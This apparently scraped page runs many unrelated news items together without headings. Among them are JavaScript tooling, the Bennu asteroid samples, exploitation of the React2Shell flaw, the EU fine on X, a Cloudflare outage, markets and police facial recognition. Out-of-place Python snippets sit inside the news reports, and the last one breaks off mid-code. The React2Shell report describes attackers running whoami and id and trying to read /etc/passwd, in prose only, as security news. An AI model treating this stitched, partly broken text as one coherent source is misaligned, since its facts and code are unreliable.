Zoe Rosenberg : “We found that there were dead birds among the living, that the air quality was so poor that chickens were struggling to breathe. I myself was struggling to breathe even with a KN95 mask as I investigated this facility. … And we have been calling on the California attorney general to take action, because the Sonoma County District Attorney’s Office has made it abundantly clear that they do not care about these animals whatsoever, that they care far more about the profits of Perdue, a company that makes over $10 billion a year on the backs of these animals.”
Dec 05, 2025
The Trump administration has ended a policy granting visitors free access to national parks on the Juneteenth and Martin Luther King Jr. Day holidays. Instead, the 116 parks that charge entrance fees will now waive admission charges on June 14 — President Trump’s birthday.
Over the last couple of years, we've witnessed a remarkable shift in the JavaScript ecosystem, as many popular developer tools have been rewritten in systems programming languages like Rust, Go, and Zig.
This transition has delivered dramatic performance improvements and other innovations that are reshaping how developers build JavaScript-backed applications.
In this article, we'll explore the driving forces behind this revolution, its implications for the wider ecosystem, and some of the most impactful projects leading the charge.
The shift toward building JavaScript tooling in systems languages is a response to real, mounting pressure in the ecosystem. While JavaScript engines have become remarkably fast over the years, the language itself wasn't designed for CPU-heavy workloads.
Modern JavaScript applications aren't just a few scripts anymore — they're sprawling codebases with thousands of dependencies, complex module graphs, and extensive build pipelines.
JavaScript-based tools that were once "good enough" now struggle to keep up, leading to sluggish build times, laggy editor experiences, and frustratingly slow feedback loops.
That's where languages like Rust and Go come in. They offer native performance, better memory management, and efficient concurrency — all of which translate into tooling that's not just faster, but more reliable and scalable.
Rust, in particular, with its seemingly cult-like following, has become the language of choice for much of this new wave. Its growing popularity has inspired a new generation of developers who care deeply about correctness, speed, and user experience. This has created a virtuous cycle where we get more tools and faster innovation.
All of this points to a broader realization in the JavaScript world: if we want tooling that scales with the demands of modern development, we have to look beyond JavaScript itself.
Let's look at some of the most influential and promising tools redefining the JavaScript developer experience: SWC, ESBuild, BiomeJS, Oxc, FNM/Volta, and TypeScript in Go.
SWC was among the first major JavaScript tools written in a language other than JavaScript itself (Rust), thus establishing a pattern that many others would follow.
At its core, it provides a high-performance platform for JavaScript/TypeScript transpilation, bundling, minification, and transformation through WebAssembly.
It has been largely successful in its goal of serving as a drop-in replacement for Babel, delivering transpilation speeds up to 20x faster while maintaining broad compatibility with most Babel configurations.
At a time when most developer tools were still being written in JavaScript, the idea of using systems languages like Go or Rust was considered more of an experiment than a trend.
But ESBuild changed that. In many ways, it sparked a broader wave of interest in building faster, lower-level tools that could dramatically improve the developer experience.
Created by Evan Wallace (former CTO of Figma), ESBuild was purpose-built to replace legacy bundlers like Webpack and Rollup with a much faster, simpler alternative. It achieves 10–100x faster performance in tasks like bundling, minification, and transpilation due to its Go-backed architecture.
Its speed, minimal configuration, and modern architecture have since influenced a generation of tools and helped shift the expectations around what JavaScript tooling should feel like, and for this reason, it remains the most adopted non-JavaScript tool to date, with over 50 million weekly downloads on NPM.
BiomeJS is an ambitious Rust-based project that combines code formatting and linting into a single high-performance JavaScript toolchain.
Originally a fork of the now-defunct Rome project , BiomeJS delivers significant performance improvements over its entrenched predecessors.
BiomeJS simplifies the development workflow by consolidating these functions into a unified configuration system, eliminating the need to manage separate tools with overlapping functionality.
Though it's still catching up to its more established counterparts in language support and extensibility, it is an increasingly attractive option for anyone seeking better performance and simpler tooling.
A newer entrant to the field, Oxc is a collection of Rust-based JavaScript tools focusing on linting, formatting, and transforming JavaScript/TypeScript code.
It is part of the VoidZero project founded by Evan You (creator of Vue.js and Vite), and aims to be the backbone for the next-generation of JavaScript tooling.
Oxc's headline features include a high-performance parser and its linter, oxlint, which has already seen adoption at scale:
oxlint has been a massive win for us at Shopify. Our previous linting setup took 75 minutes to run, so we were fanning it out across 40+ workers in CI. By comparison, oxlint takes around 10 seconds to lint the same codebase on a single worker, and the output is easier to interpret. We even caught a few bugs that were hidden or skipped by our old setup when we migrated!
— Jason Miller, creator of Preact
Modern Node.js version management has greatly improved with tools like Fast Node Manager (fnm) and Volta , which are compelling alternatives to NVM. Another option is Mise , which supports Node.js along with many other development tools.
These Rust-based tools offer significantly faster shell initialization times and full cross-platform support with a much smaller memory footprint.
They address long-standing pain points in NVM, such as sluggish startup and lack of Windows compatibility, while adding conveniences like per-project version switching and seamless global package management.
Perhaps the most surprising development in recent months is Microsoft's work on porting TypeScript's compiler to Go .
While it's still in active development, preliminary benchmarks already show remarkable improvements in build times (~10x for VS Code's codebase), editor startup speeds, and memory usage.
This native port addresses TypeScript's scaling challenges in large codebases, where developers previously had to compromise between snappy editor performance and rich type feedback.
While some viewed the choice of Go over Rust as a missed opportunity, given the latter's dominance in modern JavaScript tooling, the rationale behind this decision aligns well with the project's practical goals:
The existing code base makes certain assumptions -- specifically, it assumes that there is automatic garbage collection -- and that pretty much limited our choices. That heavily ruled out Rust. I mean, in Rust you have memory management, but it's not automatic; you can get reference counting or whatever you could, but then, in addition to that, there's the borrow checker and the rather stringent constraints it puts on you around ownership of data structures. In particular, it effectively outlaws cyclic data structures, and all of our data structures are heavily cyclic.
— Anders Hejlsberg, creator of TypeScript
Microsoft intends to ship the Go-based implementation as TypeScript 7.0 in the coming months, but native previews are already available for experimentation.
Beyond the clear performance gains, the rise of native tooling for JavaScript brings deeper, ecosystem-wide implications.
With many established and upcoming tools now relying on entirely different runtimes and ecosystems, contributing becomes less accessible to the majority of JavaScript developers.
At the same time, this shift may influence the skill sets that developers choose to pursue in the first place. While not everyone needs to write systems-level code, understanding how these languages work and what they make possible will drive even more innovative tooling in the coming years.
Unsurprisingly, although learning Rust or Zig presents a steeper barrier to entry, developers overwhelmingly prefer faster tools (even if they're harder to contribute to).
One other subtle but important tradeoff is the loss of dogfooding, where tool creators stop using their own language to build their tools, a practice that has historically helped keep developers in tune with the experience they're shaping.
Moving to a different implementation language can weaken that feedback loop, and while many projects are aware of this risk, the long-term impact of a lack of dogfooding remains an open question.
The tools covered here represent just a slice of the growing ecosystem of performance-focused, native-powered developer tools, and the momentum behind this new wave is undeniable.
Other notable efforts in this space include Turbopack and Turborepo (from Vercel), Dprint (a Prettier alternative), and even full-fledged runtimes like Bun (written in Zig) and Deno (Rust), which reimagine what's possible by rebuilding JavaScript infrastructure from the ground up.
Together, these tools reflect a broader shift in the JavaScript world that makes it clear that the future of JavaScript tooling is being written in Rust, Go, Zig, and beyond.
In this post, we explored several tools driving a new wave of performance and innovation across the JavaScript ecosystem.
The performance revolution in JavaScript tooling is a fascinating case study in ecosystem evolution.
Instead of being constrained by the limitations of JavaScript itself, the community has pragmatically embraced other languages to push the boundaries of what's possible.
The asteroid Bennu continues to provide new clues to scientists’ biggest questions about the formation of the early solar system and the origins of life. As part of the ongoing study of pristine samples delivered to Earth by NASA’s OSIRIS-REx (Origins, Spectral Interpretation, Resource Identification, and Security-Regolith Explorer) spacecraft, three new papers published Tuesday in the journals Nature Geoscience and Nature Astronomy present remarkable discoveries: sugars essential for biology, a gum-like substance not seen before in astromaterials, and an unexpectedly high abundance of dust produced by supernova explosions.
Sugars essential to life
Scientists led by Yoshihiro Furukawa of Tohoku University in Japan found sugars essential for biology on Earth in the Bennu samples, detailing their findings in the journal Nature Geoscience . The five-carbon sugar ribose and, for the first time in an extraterrestrial sample, six-carbon glucose were found. Although these sugars are not evidence of life, their detection, along with previous detections of amino acids, nucleobases, and carboxylic acids in Bennu samples, show building blocks of biological molecules were widespread throughout the solar system.
For life on Earth, the sugars deoxyribose and ribose are key building blocks of DNA and RNA, respectively. DNA is the primary carrier of genetic information in cells. RNA performs numerous functions, and life as we know it could not exist without it. Ribose in RNA is used in the molecule’s sugar-phosphate “backbone” that connects a string of information-carrying nucleobases.
“All five nucleobases used to construct both DNA and RNA, along with phosphates, have already been found in the Bennu samples brought to Earth by OSIRIS-REx,” said Furukawa. “The new discovery of ribose means that all of the components to form the molecule RNA are present in Bennu.”
The discovery of ribose in asteroid samples is not a complete surprise. Ribose has previously been found in two meteorites recovered on Earth. What is important about the Bennu samples is that researchers did not find deoxyribose. If Bennu is any indication, this means ribose may have been more common than deoxyribose in environments of the early solar system.
Researchers think the presence of ribose and lack of deoxyribose supports the “RNA world” hypothesis, where the first forms of life relied on RNA as the primary molecule to store information and to drive chemical reactions necessary for survival.
“Present day life is based on a complex system organized primarily by three types of functional biopolymers: DNA, RNA, and proteins,” explains Furukawa. “However, early life may have been simpler. RNA is the leading candidate for the first functional biopolymer because it can store genetic information and catalyze many biological reactions.”
The Bennu samples also contained one of the most common forms of “food” (or energy) used by life on Earth, the sugar glucose, which is the first evidence that an important energy source for life as we know it was also present in the early solar system.
Mysterious, ancient ‘gum’
A second paper, in the journal Nature Astronomy led by Scott Sandford at NASA’s Ames Research Center in California’s Silicon Valley and Zack Gainsforth of the University of California, Berkeley, reveals a gum-like material in the Bennu samples never seen before in space rocks – something that could have helped set the stage on Earth for the ingredients of life to emerge. The surprising substance was likely formed in the early days of the solar system, as Bennu’s young parent asteroid warmed.
Once soft and flexible, but since hardened, this ancient “space gum” consists of polymer-like materials extremely rich in nitrogen and oxygen. Such complex molecules could have provided some of the chemical precursors that helped trigger life on Earth, and finding them in the pristine samples from Bennu is important for scientists studying how life began and whether it exists beyond our planet.
Bennu’s ancestral asteroid formed from materials in the solar nebula – the rotating cloud of gas and dust that gave rise to the solar system – and contained a variety of minerals and ices. As the asteroid began to warm, due to natural radiation, a compound called carbamate formed through a process involving ammonia and carbon dioxide. Carbamate is water soluble, but it survived long enough to polymerize, reacting with itself and other molecules to form larger and more complex chains impervious to water. This suggests that it formed before the parent body warmed enough to become a watery environment.
“With this strange substance, we’re looking at, quite possibly, one of the earliest alterations of materials that occurred in this rock,” said Sandford. “On this primitive asteroid that formed in the early days of the solar system, we’re looking at events near the beginning of the beginning.”
Using an infrared microscope, Sandford’s team selected unusual, carbon-rich grains containing abundant nitrogen and oxygen. They then began what Sandford calls “blacksmithing at the molecular level,” using the Molecular Foundry at Lawrence Berkeley National Laboratory (Berkeley Lab) in Berkeley, California. Applying ultra-thin layers of platinum, they reinforced a particle, welded on a tungsten needle to lift the tiny grain, and shaved the fragment down using a focused beam of charged particles.
When the particle was a thousand times thinner than a human hair, they analyzed its composition via electron microscopy at the Molecular Foundry and X-ray spectroscopy at Berkeley Lab’s Advanced Light Source. The ALS’s high spatial resolution and sensitive X-ray beams enabled unprecedented chemical analysis.
“We knew we had something remarkable the instant the images started to appear on the monitor,” said Gainsforth. “It was like nothing we had ever seen, and for months we were consumed by data and theories as we attempted to understand just what it was and how it could have come into existence.”
The team conducted a slew of experiments to examine the material’s characteristics. As the details emerged, the evidence suggested the strange substance had been deposited in layers on grains of ice and minerals present in the asteroid.
It was also flexible – a pliable material, similar to used gum or even a soft plastic. Indeed, during their work with the samples, researchers noticed the strange material was bendy and dimpled when pressure was applied. The stuff was translucent, and exposure to radiation made it brittle, like a lawn chair left too many seasons in the sun.
“Looking at its chemical makeup, we see the same kinds of chemical groups that occur in polyurethane on Earth,” said Sandford, “making this material from Bennu something akin to a ‘space plastic.’”
The ancient asteroid stuff isn’t simply polyurethane, though, which is an orderly polymer. This one has more “random, hodgepodge connections and a composition of elements that differs from particle to particle,” said Sandford. But the comparison underscores the surprising nature of the organic material discovered in NASA’s asteroid samples, and the research team aims to study more of it.
By pursuing clues about what went on long ago, deep inside an asteroid, scientists can better understand the young solar system – revealing the precursors to and ingredients of life it already contained, and how far those raw materials may have been scattered, thanks to asteroids much like Bennu.
Abundant supernova dust
Another paper in the journal Nature Astronomy, led by Ann Nguyen of NASA’s Johnson Space Center in Houston, analyzed presolar grains – dust from stars predating our solar system – found in two different rock types in the Bennu samples to learn more about where its parent body formed and how it was altered by geologic processes. It is believed that presolar dust was generally well-mixed as our solar system formed. The samples had six times as much supernova dust as any other studied astromaterial, suggesting the asteroid’s parent body formed in a region of the protoplanetary disk enriched in the dust of dying stars.
The study also reveals that, while Bennu’s parent asteroid experienced extensive alteration by fluids, there are still pockets of less-altered materials within the samples that offer insights into its origin.
“These fragments retain a higher abundance of organic matter and presolar silicate grains, which are known to be easily destroyed by aqueous alteration in asteroids,” said Nguyen. “Their preservation in the Bennu samples was a surprise and illustrates that some material escaped alteration in the parent body. Our study reveals the diversity of presolar materials that the parent accreted as it was forming.”
NASA’s Goddard Space Flight Center provided overall mission management, systems engineering, and the safety and mission assurance for OSIRIS-REx. Dante Lauretta of the University of Arizona, Tucson, is the principal investigator. The university leads the science team and the mission’s science observation planning and data processing. Lockheed Martin Space in Littleton, Colorado, built the spacecraft and provided flight operations. Goddard and KinetX Aerospace were responsible for navigating the OSIRIS-REx spacecraft. Curation for OSIRIS-REx takes place at NASA’s Johnson Space Center in Houston. International partnerships on this mission include the OSIRIS-REx Laser Altimeter instrument from CSA (Canadian Space Agency) and asteroid sample science collaboration with JAXA’s (Japan Aerospace Exploration Agency’s) Hayabusa2 mission. OSIRIS-REx is the third mission in NASA’s New Frontiers Program, managed by NASA’s Marshall Space Flight Center in Huntsville, Alabama, for the agency’s Science Mission Directorate in Washington.
For more information on the OSIRIS-REx mission, visit:
https://www.nasa.gov/osiris-rex
Multiple China-linked threat actors began exploiting the React2Shell vulnerability (CVE-2025-55182) affecting React and Next.js just hours after the max-severity issue was disclosed.
React2Shell is an insecure deserialization vulnerability in the React Server Components (RSC) 'Flight' protocol. Exploiting it does not require authentication and allows remote execution of JavaScript code in the server's context.
The Next.js framework was initially assigned a separate identifier, CVE-2025-66478, but that tracking number was rejected from the National Vulnerability Database's CVE list as a duplicate of CVE-2025-55182.
The security issue is easy to leverage, and several proof-of-concept (PoC) exploits have already been published, increasing the risk of related threat activity.
The vulnerability spans several versions of the widely used library, potentially exposing thousands of dependent projects. Wiz researchers say that 39% of the cloud environments they can observe are susceptible to React2Shell attacks.
React and Next.js have released security updates, but the issue is trivially exploitable without authentication and in the default configuration.
A report from Amazon Web Services (AWS) warns that the Earth Lamia and Jackpot Panda threat actors linked to China started to exploit React2Shell almost immediately after the public disclosure.
"Within hours of the public disclosure of CVE-2025-55182 (React2Shell) on December 3, 2025, Amazon threat intelligence teams observed active exploitation attempts by multiple China state-nexus threat groups, including Earth Lamia and Jackpot Panda," reads the AWS report .
AWS's honeypots also caught activity not attributed to any known clusters, but which still originates from China-based infrastructure.
Many of the attacking clusters share the same anonymization infrastructure, which further complicates individualized tracking and specific attribution.
Regarding the two identified threat groups, Earth Lamia focuses on exploiting web application vulnerabilities.
Typical targets include entities in the financial services, logistics, retail, IT companies, universities, and government sectors across Latin America, the Middle East, and Southeast Asia.
Jackpot Panda targets are usually located in East and Southeast Asia, and its attacks are aimed at collecting intelligence on corruption and domestic security.
Lachlan Davidson, the researcher who discovered and reported React2Shell, warned about fake exploits circulating online. However, exploits confirmed as valid by Rapid7 researcher Stephen Fewer and Elastic Security's Joe Desimone have appeared on GitHub.
The attacks that AWS observed leverage a mix of public exploits, including broken ones, along with iterative manual testing and real-time troubleshooting against targeted environments.
The observed activity includes repeated attempts with different payloads, Linux command execution (whoami, id), attempts to create files (/tmp/pwned.txt), and attempts to read '/etc/passwd'.
"This behavior demonstrates that threat actors aren't just running automated scans, but are actively debugging and refining their exploitation techniques against live targets," comment AWS researchers.
Attack surface management (ASM) platform Assetnote has released a React2Shell scanner on GitHub that can be used to determine if an environment is vulnerable to React2Shell.
Elon Musk’s social media platform, X, has been fined €120m (£105m) after it was found in breach of new EU digital laws, in a ruling likely to put the European Commission on a collision course with the US billionaire and potentially Donald Trump.
The breaches, under consideration for two years, included what the EU said was a “deceptive” blue tick verification badge given to users and the lack of transparency of the platform’s advertising.
The commission rules require tech companies to provide a public list of advertisers to ensure the company’s structures guard against illegal scams, fake advertisements and coordinated campaigns in the context of political elections.
In a third breach, the EU also concluded that X had failed to provide the required access to public data available to researchers, who typically keep tabs on contentious issues such as political content.
The ruling by the European Commission brings to a close part of an investigation that started two years ago.
The commission said on Friday it had found X in breach of transparency obligations under the Digital Services Act (DSA), in the first ruling against the company since the laws regulating the content of social media and large tech platforms came into force in 2023.
In December 2023, the commission opened formal proceedings to assess whether X may have breached the DSA in areas linked to the dissemination of illegal content and the effectiveness of the measures taken to combat information manipulation, for which the investigation continues.
Under the DSA, X can be fined up to 6% of its worldwide revenue, which was estimated to be between $2.5bn (£1.9bn) and $2.7bn in 2024.
Three other investigations remain, two of which relate to the content and the algorithms promoting content that changed after Musk bought Twitter in October 2022 and rebranded it X.
The commission continues to investigate whether there have been breaches of laws prohibiting incitement to violence or terrorism.
It is also looking into the mechanism for users to flag and report what they believe is illegal content.
Senior officials said the fine broke down into three sections: €45m for introducing a “verification” blue tick that users could buy, leaving others unable to determine the authenticity of account holders; €35m for breaches of ad regulations; and €40m for data access breaches in relation to research.
Before Musk took over Twitter, blue ticks were only awarded to verifiable account holders, including politicians, celebrities, public bodies and verified journalists in mainstream media and established new media, such as bloggers and YouTubers. After the takeover, users who subscribed to X Premium were then eligible for blue tick status .
Henna Virkkunen, who is the executive vice-president at the European Commission responsible for tech regulation, said: “With the DSA’s first non-compliance decision, we are holding X responsible for undermining users’ rights and evading accountability.
“Deceiving users with blue checkmarks, obscuring information on ads and shutting out researchers have no place online in the EU.”
The ruling risks enraging Trump’s administration. Last week the US commerce secretary, Howard Lutnick, said the EU must consider its tech regulations in order to get 50% tariffs on steel reduced.
His threats were branded “blackmail” by Teresa Ribera, the EU commissioner in charge of Europe’s green transition and antitrust enforcement.
Senior EU officials said the ruling was independent of any pleadings by the US delegation in Brussels last week to meet trade ministers. They said the EU retained its “sovereign right” to regulate US tech companies, with 25 businesses including non-US companies such as TikTok coming under the DSA.
Musk – who is on a path to become the world’s first trillionaire – has 90 days to come up with an “action plan” to respond to the fine but ultimately he is also free to appeal against any EU ruling, as others, such as Apple, have done in the past, taking their case to the European court of justice.
At the same time, the EU has announced it has secured commitments from TikTok to provide advertising repositories to address the commission concerns raised in May about transparency.
The DSA requires platforms to maintain an accessible and searchable repository of the ads running on their services to allow researchers and representatives of civil society “to detect scams, advertisements for illegal or age-inappropriate”.
Senior officials said the phenomenon of fake political adverts or ads with fake celebrities cannot be studied unless the social media companies stick to the rules.
X has been approached for comment. The EU said the company had been informed of the decision.
Technical problems at internet infrastructure provider Cloudflare today have taken a host of websites offline this morning.
Cloudflare said shortly after 9am UK time that it “is investigating issues with Cloudflare Dashboard and related APIs [application programming interfaces – used when apps exchange data with each other]”.
Cloudflare has also reported it has implemented a potential fix to the issue and is monitoring the results.
But the outage has affected a number of websites and platforms, with reports of problems accessing LinkedIn, X, Canva – and even the DownDetector site used to monitor online service issues.
Last month, an outage at Cloudflare made many websites inaccessible for about three hours.
Jake Moore, global cybersecurity adviser at ESET, has summed up the problem:
“If a major provider like Cloudflare goes down for any reason, thousands of websites instantly become unreachable.
“The problems often lie with the fact we are using an old network to direct internet users around the world to websites but it simply highlights there is one huge single point of failure in this legacy design.”
The Metro newspaper reports that shopping sites were affected by the Cloudflare IT problems too – such as Shopify, Etsy, Wayfair, and H&M.
H&M’s website is slow to load right now, but the other three seem to be working…
Today’s Cloudflare outage is likely to intensify concerns that internet users are relying on too few technology providers.
Tim Wright, technology partner at Fladgate , explains:
“Cloudflare’s latest outage is another reminder that much of the internet runs through just a few hands. Businesses betting on “always-on” cloud resilience are discovering its single points of failure. Repeated disruptions will draw tougher scrutiny from regulators given DORA, NIS2, and the UK’s emerging operational resilience regimes.
Dependence on a small set of intermediaries may be efficient but poses a structural risk the digital economy cannot ignore. We can expect regulators to probe the concentration of critical functions in the cloud and edge layers — while businesses rethink whether convenience has quietly outpaced control.”
Cloudflare’s System Status page shows that the problem that knocked many websites offline has been resolved.
Cloudflare insists the problem was not a cyber attack; instead, it appears to have been caused by a deliberate change to how its firewall handles data requests, made to fix a security vulnerability.
Cloudflare says:
This incident has been resolved.
A change made to how Cloudflare’s Web Application Firewall parses requests caused Cloudflare’s network to be unavailable for several minutes this morning. This was not an attack; the change was deployed by our team to help mitigate the industry-wide vulnerability disclosed this week in React Server Components. We will share more information as we have it today.
An IT issue affecting air traffic control has forced Edinburgh Airport to halt all flights today.
Edinburgh Airport said in a statement:
“No flights are currently operating from Edinburgh Airport.
“Teams are working on the issue and will resolve as soon as possible.”
The Airport’s departure page is showing eight flights delayed and five cancelled, but passengers for many other flights are being told to go to the gate.
Reports of problems at Cloudflare peaked at just after 9am UK time:
Online video conferencing service Zoom, and Transport for London’s website (used for travel information in the capital), are among the sites hit by the Cloudflare outage.
In a separate cereal supply and demand report, the FAO raised its global cereal production forecast for 2025 to a record 3.003 billion metric tons.
That’s up from 2.990 billion tons projected last month, mainly due to increased estimates for wheat output.
The FAO’s forecast for world cereal stocks at the end of the 2025/26 season has also been revised up to a record 925.5 million tons, reflecting expectations of expanded wheat stocks in China and India as well as higher coarse grain stocks in exporting countries.
Global food prices have fallen for the third month running.
The UN’s Food Price Index, which tracks a basket of food commodities, dropped by 1.2% in November, thanks to a drop in the cost of dairy products, meat, sugar and vegetable oils.
That could help to push down inflation, if these reductions are passed onto consumers.
However, cereal prices rose by 1.8% last month, due to “potential Chinese interest in supplies from the United States of America, concerns over continuing hostilities in the Black Sea region, and expectations of reduced plantings in the Russian Federation”, the UN’s Food and Agriculture Organisation reports.
Vegetable oil prices fell by 2.6% in the month, to a five-month low, due to prices of palm, rapeseed and sunflower oils.
Meat prices dropped by 0.8%, driven by lower pig and poultry meat prices and the removal of tariffs on beef imports into the US.
Dairy prices fell by 3.1% in November, thanks to rising milk production and abundant export supplies in key producing regions, supported by ample butter and skim milk powder inventories in the European Union and seasonally higher output in New Zealand.
Sugar prices dropped by 5.9% in the month, and were almost 30% lower than a year ago, as expectations of ample global sugar supplies in the current season pushed down prices. Strong production in Brazil’s key southern growing regions, a good early season start to India’s harvest and favourable crop prospects in Thailand all contributed.
European stock markets are ending the week on the front foot.
The main European indices are a little higher this morning; Germany’s DAX is up 0.55%, France’s CAC 40 is 0.3% higher, and the UK’s FTSE 100 has risen by 0.14%.
Investors are waiting for new US inflation data later today (1.30pm UK time), which could influence interest rate expectations ahead of next week’s US Federal Reserve meeting.
Kyle Rodda, senior financial market analyst at Capital.com, says:
Risk assets are cautiously edging higher to round out the week, with US PCE Index data in focus this afternoon.
Ultimately, the markets appear to be looking for a signal that it’s all clear to keep moving higher again. That signal could come from data. But given the lack of it between now and the middle of next week, it’s more likely to come from the FOMC decision.
The current implied probabilities of a cut are 87%, according to FedWatch – swaps markets suggest a little higher. The markets won’t just want to see a cut delivered but also some dovish enough language and forecasts about the prospect of future cuts. Another hawkish cut, like that which was seen in October, could upset the apple cart, if it were to occur.
Nevertheless, European stocks have run with a broadly positive lead-in from Asian markets, with US futures also pointing higher.
Mark Sweney
Warner Bros Discovery has entered exclusive talks to sell its streaming and Hollywood studio business to Netflix, a move that would dramatically change the established film and TV landscape.
Netflix is in competition with Paramount Skydance and Comcast, which owns assets including Universal Studios and Sky, to buy the owner of the Hollywood studio Warner Bros , HBO and the HBO Max streaming service.
Netflix is offering a $5bn (£3.7bn) breakup fee if the deal fails to gain regulatory approval in the US, according to Bloomberg, which first reported the exclusive talks.
Shares in Ocado have jumped by over 10% at the start of trading, after it agreed a compensation deal with US grocer Kroger.
Ocado is to receive a one-off $350m cash payment from Kroger, which decided last month to close three robotic warehouses which use the UK company’s high-tech equipment, in Maryland, Wisconsin, and Florida.
That decision, announced in mid-November, had knocked 17% off Ocado’s shares.
This morning, though, they’ve jumped to the top of the FTSE 250 index, up 11.5% to 206p.
Ocado had previously said it expected to receive more than $250m in compensation from Kroger .
But it has also revealed today that Kroger has decided to cancel another tie-up with Ocado – a planned automated distribution centre run on the UK group’s technology in Charlotte, North Carolina.
Last month, retail analyst Clive Black of Shore Capital said Ocado was “being marginalised as most of its customer fulfilment centres do not work economically in the USA”.
Ocado says it continues to “work closely” with Kroger on five other customer fulfillment centres in US states such as Texas and Michigan.
Tim Steiner, CEO of Ocado Group, has said:
“We continue to invest significant resources to support our partners at Kroger, and to help them build on our longstanding partnership. Ocado’s technology has evolved significantly to include both the new technologies that Kroger is currently deploying in its CFC network, as well as new fulfilment products that bring Ocado’s technology to a wider range of applications, including Store Based Automation to support ‘pick up’ and immediacy.”
“Our partners around the world have already deployed a wide range of these fulfilment technologies to great effect, enabling them to address a wide spectrum of geographies, population densities and online shopping missions, underpinned by Ocado’s world leading expertise and R&D capabilities. We remain excited about the opportunity for Ocado’s evolving products in the US market.”
Halifax’s Amanda Bryden reckons UK house prices will rise “gradually” next year, saying:
“Looking ahead, with market activity steady and expectations of further interest rate reductions to come, we anticipate property prices will continue to grow gradually into 2026.”
Karen Noye, mortgage expert at Quilter, says affordability remains the biggest hurdle, even though inflation has eased and another interest rate cut is expected later this month, adding:
“The outlook for 2026 rests on the path of mortgage rates and the resilience of household incomes. Greater clarity post budget and the prospect of lower borrowing costs give the market a firmer footing, but affordability will remain the defining constraint.”
Tom Bill, head of UK residential research at Knight Frank, says pre-Budget uncertainty pushed house price growth close to zero, adding:
“Clarity has now returned, but an array of tax rises, which include an income tax threshold freeze, will increasingly squeeze demand and prices. Offsetting that is the fact that mortgage rates are expected to drift lower next year as the base rate bottoms out at around 3.25%.”
Technically, UK house prices did rise slightly last month. On Halifax’s data, the average price was £299,892, marginally up from £299,754 in October. That’s a new record high on this index.
Halifax’s regional data continues to show a clear North/South divide – prices fell in the south of the UK last month, but were stronger elsewhere.
Northern Ireland remains the strongest performing nation or region in the UK, with average property prices rising by +8.9% over the past year (up from +7.9% last month). The typical home now costs £220,716.
Scotland recorded annual price growth of +3.7% in November, up to an average of £216,781. In Wales property values rose +1.9% year-on-year to £229,430.
In England, the North West recorded the highest annual growth rate, with property prices rising by +3.2% to £245,070, followed by the North East with growth of +2.9% to £180,939. Further south, three regions saw prices decrease in November.
In London prices fell by -1.0%, the South East by -0.3% and Eastern England by -0.1%. The capital remains the most expensive part of the UK, with an average property now costing £539,766.
Good morning, and welcome to our rolling coverage of business, the financial markets and the world economy.
As the first week of December draws to a close, we have fresh evidence that the economy cooled in the run-up to last month’s budget.
UK house prices were broadly unchanged in November, lender Halifax reports, with the average property changing hands for £299,892. That stagnation follows a 0.5% rise in October, and makes houses slightly more affordable to new buyers.
On an annual basis, prices were 0.7% higher – down from +1.9% house price inflation in October.
Amanda Bryden , head of mortgages at Halifax , explains:
“This consistency in average prices reflects what has been one of the most stable years for the housing market over the last decade. Even with the changes to Stamp Duty back in spring and some uncertainty ahead of the Autumn Budget, property values have remained steady.
“While slower growth may disappoint some existing homeowners, it’s welcome news for first-time buyers. Comparing property prices to average incomes, affordability is now at its strongest since late 2015. Taking into account today’s higher interest rates, mortgage costs as a share of income are at their lowest level in around three years.”
Shoppers also reined in their spending in the shops last month.
A survey by business advisory service BDO has found that in-store sales grew by just +1.3% in November, despite the potential sales boost from Black Friday.
That is well below the rate of inflation, which means that sales volumes are significantly down, BDO says.
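As a rough illustration of that arithmetic: if in-store sales grow by 1.3% in cash terms while prices rise faster, the quantity of goods sold must be falling. The sketch below uses the BDO figure plus a hypothetical inflation rate chosen only as a placeholder, not an official statistic.

```python
# Rough illustration of why nominal growth below inflation implies falling volumes.
# The 1.3% figure is from the BDO survey above; the inflation rate is a hypothetical
# placeholder, not an official statistic.
nominal_growth = 0.013   # +1.3% in-store sales growth (cash value)
inflation = 0.035        # hypothetical price inflation over the same period

real_growth = (1 + nominal_growth) / (1 + inflation) - 1
print(f"Implied change in sales volumes: {real_growth:.1%}")  # roughly -2.1%
```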
7am GMT: Halifax house price index for November
7am GMT: German factory orders data for October
8.30am GMT: UN food commodities price index
3pm GMT: US PCE inflation report
3pm GMT: University of Michigan consumer confidence report
LISP STYLE & DESIGN explores the process of style in the development of Lisp programs. Style comprises efficient algorithms, good organization, appropriate abstractions, well-constructed function definitions, useful commentary, and effective debugging. Good design and style enhance programming efficiency because they make programs easier to understand, to debug, and to maintain.
A special feature of this book is the large programming example that the authors use throughout to illustrate how the process develops: organizing the approach, choosing constructs, using abstractions, structuring files, debugging code, and improving program efficiency. Lisp programmers, symbolic programmers or those intrigued by symbolic programming,
as well as students of Lisp should consider this book an essential addition to their libraries.
Molly M. Miller is Manager of Technical Publications and Training for Lucid, Inc. She holds degrees in Computer Science, Mathematics, and English and has done graduate work in symbolic and heuristic computation at Stanford University.
Eric Benson is Principal Scientist at Lucid, Inc. He is a graduate of the University of Utah with a degree in mathematics and is a co-founder of Lucid.
Ministers are facing calls for stronger safeguards on the use of facial recognition technology after the Home Office admitted it is more likely to incorrectly identify black and Asian people than their white counterparts on some settings.
Following the latest testing conducted by the National Physical Laboratory (NPL) of the technology’s application within the police national database, the Home Office said it was “more likely to incorrectly include some demographic groups in its search results”.
Police and crime commissioners said publication of the NPL’s finding “sheds light on a concerning inbuilt bias” and urged caution over plans for a national expansion.
The findings were released on Thursday, hours after Sarah Jones, the policing minister, had described the technology as the “biggest breakthrough since DNA matching”.
Facial recognition technology scans people’s faces and then cross-references the images against watchlists of known or wanted criminals. It can be used while examining live footage of people passing cameras, comparing their faces with those on wanted lists, or be used by officers to target individuals as they walk by mounted cameras.
Images of suspects can also be run retrospectively through police, passport or immigration databases to identify them and check their backgrounds.
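For readers unfamiliar with how such a search works mechanically, here is a heavily simplified sketch, assuming face embeddings have already been extracted by some model. The names, vectors and threshold are illustrative placeholders, not any force’s actual system.

```python
# Heavily simplified sketch of the watchlist-matching step. Embeddings, names and
# the threshold are all illustrative placeholders.
import numpy as np

def cosine_similarity(a: np.ndarray, b: np.ndarray) -> float:
    # Similarity of two face embeddings, in [-1, 1]
    return float(np.dot(a, b) / (np.linalg.norm(a) * np.linalg.norm(b)))

def search_watchlist(probe: np.ndarray, watchlist: dict[str, np.ndarray],
                     threshold: float = 0.8) -> list[str]:
    """Return watchlist entries whose embedding is close enough to the probe image."""
    return [name for name, ref in watchlist.items()
            if cosine_similarity(probe, ref) >= threshold]

# Example with random vectors standing in for real embeddings:
rng = np.random.default_rng(0)
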